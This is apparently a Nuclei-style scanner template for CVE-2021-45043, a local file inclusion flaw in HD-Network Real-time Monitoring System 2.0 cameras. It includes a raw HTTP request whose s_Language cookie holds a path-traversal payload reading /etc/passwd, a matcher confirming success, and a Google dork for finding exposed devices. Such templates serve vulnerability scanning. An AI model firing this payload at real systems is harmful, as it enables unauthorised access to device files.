32 lines
1.1 KiB
YAML
32 lines
1.1 KiB
YAML
|
id: CVE-2021-45043
|
||
|
|
||
|
info:
|
||
|
name: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion
|
||
|
author: Evan Rubinstein
|
||
|
severity: high
|
||
|
description: Instances of HD-Netowrk Real-time Monitoring System version 2.0 are vulnerable to a Local File Inclusion (LFI) vulnerability which allows remote unauthenticate attackers to view important, confidnetial information.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/50588
|
||
|
- https://twitter.com/theCyberGuy0/status/1470669811269181444
|
||
|
metadata:
|
||
|
google-dork: intitle:"HD-Network Real-time Monitoring System V2.0"
|
||
|
tags: cve,cve2021,hdnetwork,lfi,iot,camera
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET /language/lang HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Referer: {{BaseURL}}
|
||
|
Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|